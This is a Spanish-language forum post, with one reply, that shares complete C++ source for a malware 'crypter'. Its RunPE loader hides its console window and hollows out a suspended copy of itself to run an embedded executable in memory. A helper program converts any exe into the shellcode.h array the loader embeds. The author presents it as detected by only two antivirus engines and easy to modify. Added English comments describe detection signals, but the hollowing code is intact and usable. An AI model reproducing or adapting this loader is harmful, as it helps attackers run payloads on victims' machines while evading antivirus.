Encontré este código fuente de un crypter en C++; es detectado por 2 antivirus. Está basado en shellcode. Lo pueden modificar fácilmente.

Aquí está el código de cómo se llama.
#include <Windows.h>
#define _WIN32_WINNT 0x0500
#include "runPE.h"
#include "shellcode.h"

// Loader entry point.  Hides its own console window, then hands its own
// on-disk path plus the embedded `shellcode` array (a complete PE image --
// the generated shellcode.h starts with 0x4D 0x5A, "MZ") to runPE::run,
// which launches that path suspended and runs the embedded image inside it.
// Detection note: a console process that hides its window and immediately
// spawns a suspended copy of itself is a characteristic hollowing prelude.
int main()
{
HWND hWnd = GetConsoleWindow();
ShowWindow( hWnd, SW_HIDE );                 // no visible window for the user
	runPE rp;
	
	TCHAR szFilePath[1024];
	// Path of this very executable: it becomes the host process image.
	GetModuleFileNameA(0, LPSTR(szFilePath), 1024);
	rp.run(LPSTR(szFilePath), shellcode);
	return 0;
}
Aqui el runPE.h
// Prototype of ntdll!NtUnmapViewOfSection.  It is a native (undocumented)
// API, so runPE::run resolves it at run time with GetProcAddress instead of
// linking against it.
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);

// RunPE / "process hollowing" loader.
//
// run() starts a second, suspended instance of szFilePath, discards the
// image Windows mapped into that child, writes the PE held in pFile in its
// place, points the child's main thread at the payload's entry point and
// resumes it.  The payload itself is never written to disk.
//
// Detection notes: the whole sequence is ordinary user-mode API activity
// that EDR/ETW-style telemetry can correlate on a single child --
// CreateProcess with CREATE_SUSPENDED of the loader's own path, a remote
// NtUnmapViewOfSection, VirtualAllocEx with PAGE_EXECUTE_READWRITE at the
// child's image base, a burst of WriteProcessMemory calls, then
// SetThreadContext + ResumeThread.  In memory forensics the child's image
// region no longer matches the file it was launched from.  Every failure
// path below leaves the child created but never resumed, i.e. an orphan
// stuck in its suspended state, which is itself an anomaly worth alerting on.
class runPE{
public:
// szFilePath: path of the executable to launch as the host (main() passes
//             the loader's own path).
// pFile:      in-memory PE image to execute; read in place and afterwards
//             passed to VirtualFree, so the caller must not reuse it.
// No return value and no error reporting; all failures are silent.  The
// register names and header offsets used below are 32-bit (x86) only.
void run(LPSTR szFilePath, PVOID pFile) 
{
	PIMAGE_DOS_HEADER IDH;     // DOS header of the payload in pFile
	PIMAGE_NT_HEADERS INH;     // NT headers of the payload
	PIMAGE_SECTION_HEADER ISH; // section header being copied
	PROCESS_INFORMATION PI;    // handles/ids of the suspended child
	STARTUPINFOA SI;           // zeroed, no customisation of the child
	PCONTEXT CTX;              // context of the child's main thread
	PDWORD dwImageBase;        // image base reported by the child's PEB
	NtUnmapViewOfSection xNtUnmapViewOfSection;  // resolved from ntdll below
	LPVOID pImageBase;         // where the payload was placed in the child
	int Count;                 // section index
	IDH = PIMAGE_DOS_HEADER(pFile);
	if (IDH->e_magic == IMAGE_DOS_SIGNATURE)          // "MZ"
	{
		INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
		if (INH->Signature == IMAGE_NT_SIGNATURE)    // "PE\0\0"
		{
			RtlZeroMemory(&SI, sizeof(SI));
			RtlZeroMemory(&PI, sizeof(PI));
			// The host is started suspended so its image can be swapped
			// before its first instruction ever runs.
			if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
			{
				CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
				CTX->ContextFlags = CONTEXT_FULL;
				if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
				{
					// On x86 a freshly created main thread has Ebx = PEB; the
					// DWORD at PEB+8 is the child's current ImageBaseAddress.
					ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
					// The original image is unmapped only when it already
					// occupies the payload's preferred base (i.e. would collide).
					if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
					{
						xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
						xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
					}
					// One RWX region at the payload's preferred base
					// (0x3000 == MEM_COMMIT | MEM_RESERVE).  If this fails
					// nothing below runs and the child stays suspended.
					pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
					if (pImageBase)
					{
						// Headers first, then every section at its VirtualAddress.
						WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
						for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
						{
							// 248 = sizeof(IMAGE_NT_HEADERS32), 40 = sizeof(IMAGE_SECTION_HEADER):
							// the 32-bit header layout is hard-coded here.
							ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
							WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
						}
						// Patch PEB.ImageBaseAddress and redirect the address the
						// main thread will jump to (Eax on a fresh x86 thread) to
						// the payload's entry point, then let the child run.
						WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
						CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
						SetThreadContext(PI.hThread, LPCONTEXT(CTX));
						ResumeThread(PI.hThread);
					}

				}
			}
		}
	}
	VirtualFree(pFile, 0, MEM_RELEASE);   // payload buffer released regardless of outcome
}
};

Necesitan agregar shellcode.h, que es su exe en shellcode; solo compilan y listo.
Perfect Hidden escribió:Gracias por el codigo!
Tengo una duda: ¿cómo puedo añadir el exe como shellcode.h?

Saludos
Generador de shellcode
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

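/*
 * bin2c-style helper: dumps a file as a C unsigned-char array so it can be
 * #included (this is how the post builds shellcode.h from an .exe).
 *
 * Usage: prog input_file [array_name] [> output_file]
 *   argv[1]  file to read (opened in binary mode)
 *   argv[2]  optional C identifier for the array; defaults to "filedata"
 *
 * Writes to stdout: `unsigned char NAME[] = { ... };` (12 bytes per line)
 * followed by `unsigned int size = N;` where N is the number of bytes
 * emitted.  Returns 0 on success and 1 on a usage error, a failed fopen,
 * a read error on the input, or a write error on stdout.
 */
int main(int argc, char *argv[]){

    FILE *f;
    int c;
    unsigned long i;            /* bytes emitted so far; also the printed size */
    const char *arr_name;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s input_file [array_name] [> output_file]\n", argv[0]);
        return 1;
    }
    f = fopen(argv[1], "rb");   /* "rb": the input is arbitrary binary data */
    if (f == NULL) {
        /* Original message lacked a newline and the reason; both added. */
        fprintf(stderr, "%s: fopen(%s) failed: %s\n", argv[0], argv[1], strerror(errno));
        return 1;
    }

    arr_name = (argc >= 3) ? argv[2] : "filedata";
    printf("unsigned char %s[] = {", arr_name);

    for (i = 0; (c = fgetc(f)) != EOF; i++) {
        if (i != 0) printf(",");
        if ((i % 12) == 0) printf("\n\t");   /* new line every 12 bytes */
        printf("0x%02X", (unsigned)c);       /* fgetc already yields 0..255 */
    }

    /* fgetc returns EOF for end-of-file *and* for a read error; a truncated
     * array would otherwise be emitted silently. */
    if (ferror(f)) {
        fprintf(stderr, "%s: read error on %s: %s\n", argv[0], argv[1], strerror(errno));
        fclose(f);
        return 1;
    }

    printf("\n\t};\n");
    printf("unsigned int size = %lu;\n", i);   /* trailing newline was missing */
    fclose(f);

    /* stdout is normally redirected to the header file; a failed write
     * (full disk, closed pipe) must not be reported as success. */
    if (fflush(stdout) != 0 || ferror(stdout)) {
        fprintf(stderr, "%s: write error on stdout\n", argv[0]);
        return 1;
    }
    return 0;
}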
Al final te debe quedar un archivo shellcode.h que empiece así:
unsigned char shellcode[] = {
0x4D,0x5A,0x50,0x00,0x02,0x00,0x00,0x00,0x04,0x00,0x0F,0x00,
0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
y que termine así:
,0x47,0x58
};
unsigned int size = 674304;
